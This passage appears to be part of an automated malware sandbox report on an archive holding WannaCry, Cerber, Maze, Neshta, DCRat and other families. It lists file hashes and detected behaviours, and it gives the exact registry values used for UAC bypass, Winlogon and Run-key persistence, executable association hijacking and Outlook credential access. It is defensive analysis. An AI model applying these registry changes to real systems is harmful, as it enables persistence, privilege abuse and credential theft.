| SHA512 | 490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry
| MD5 | 537efeecdfa94cc421e58fd82a58ba9e |
| SHA1 | 3609456e16bc16ba447979f3aa69221290ec17d0 |
| SHA256 | 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150 |
| SHA512 | e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry
| MD5 | 17194003fa70ce477326ce2f6deeb270 |
| SHA1 | e325988f68d327743926ea317abb9882f347fa73 |
| SHA256 | 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171 |
| SHA512 | dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry
| MD5 | 2efc3690d67cd073a9406a25005f7cea |
| SHA1 | 52c07f98870eabace6ec370b7eb562751e8067e9 |
| SHA256 | 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a |
| SHA512 | 0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry
| MD5 | 95673b0f968c0f55b32204361940d184 |
| SHA1 | 81e427d15a1a826b93e91c3d2fa65221c8ca9cff |
| SHA256 | 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd |
| SHA512 | 7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\minuscrypt_crypted.exe
| MD5 | 3a68a2cbeb827588f3749568b121a79b |
| SHA1 | a40fc3b0c547826353088baf247b379f1e10f25d |
| SHA256 | 2ab209c8b13fc820c0f2cd15de422053e94e2ca02b939ff97eeb2abceb5bb810 |
| SHA512 | 7ab8bb1605cfed214d05c6dac5dc05df0b66c90e7abe67629e8c879483d5f2784edae832f48acfc92c968a3da1f13e76e5db699890ed85b0c00bb551e0e70b7d |
memory/4260-309-0x0000000005060000-0x0000000005070000-memory.dmp
memory/1460-308-0x0000000000400000-0x00000000005DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry
| MD5 | c17170262312f3be7027bc2ca825bf0c |
| SHA1 | f19eceda82973239a1fdc5826bce7691e5dcb4fb |
| SHA256 | d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa |
| SHA512 | c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
| MD5 | dfb746ce95fd4c6ff5cfa5f6ec5d734b |
| SHA1 | 13e0bc9fca29c327d041b0033948c5426471cd03 |
| SHA256 | 5b17b805e68c6cf4c80b8dcdf3b5f1685b3e45d008eb5bdefd990ccd4e697c0e |
| SHA512 | 02a7ec280032cc87b3605688e66be90aa4b64f0c7badae74649c901a1ae6bdb76d45a05ffac90e41cc275fb9fd38cb779caa42223d35e0aa6f17a081dd5f5080 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry
| MD5 | 93f33b83f1f263e2419006d6026e7bc1 |
| SHA1 | 1a4b36c56430a56af2e0ecabd754bf00067ce488 |
| SHA256 | ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4 |
| SHA512 | 45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac |
memory/2212-310-0x0000000002A20000-0x0000000002A30000-memory.dmp
memory/2212-311-0x0000000002A20000-0x0000000002A30000-memory.dmp
memory/4064-312-0x0000000000400000-0x000000000041B000-memory.dmp
memory/2112-315-0x0000000000400000-0x00000000004D8000-memory.dmp
C:\Windows\directx.sys
| MD5 | 81f842c9e1e74a177048c8954514ebb8 |
| SHA1 | 2ae3ea4bb61941f1d463bc4cc3af536078c31e0f |
| SHA256 | c86507750a7b599cb480f4107a08df30407ad5a668218e0d51d6c52c885bf2bd |
| SHA512 | 9cabdd55a3edf3b78f6c92fc7ae250ea40cf0acbd26be6a18e7c443fd2e32a14f344f03f0916edd50c462305b2d07f6cad5314f65a53be95a4466c1604851621 |
memory/964-343-0x0000000000400000-0x00000000004CC000-memory.dmp
C:\Program Files (x86)\Microsoft\DesktopLayer.exe
| MD5 | ff5e1f27193ce51eec318714ef038bef |
| SHA1 | b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6 |
| SHA256 | fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320 |
| SHA512 | c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a |
memory/3844-355-0x0000000000490000-0x0000000000491000-memory.dmp
memory/2620-346-0x0000000000400000-0x00000000004CE000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-01-09 22:08
Reported
2024-01-09 22:30
Platform
win10v2004-20231222-en
Max time kernel
592s
Max time network
596s
Command Line
Signatures
Cerber
DcRat
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
HawkEye
Maze
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
Neshta
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Ramnit
Troldesh, Shade, Encoder.858
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\System32\L2SecHC\dllhost.exe | N/A |
Wannacry
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes shadow copies
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Contacts a large (1143) amount of remote hosts
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TEMPSP~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TEMPEX~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\ProgramData\AdobeReader\GeforceUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\A5D66A~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7AC9.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6b5b0cab8df9d59f.tmp | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6b5b0cab8df9d59f.tmp | C:\Users\Admin\Desktop\8.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7ADF.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt | C:\Users\Admin\Desktop\8.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt | C:\Users\Admin\Desktop\8.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8 = "\"C:\\Documents and Settings\\8.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Documents and Settings\\RuntimeBroker.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
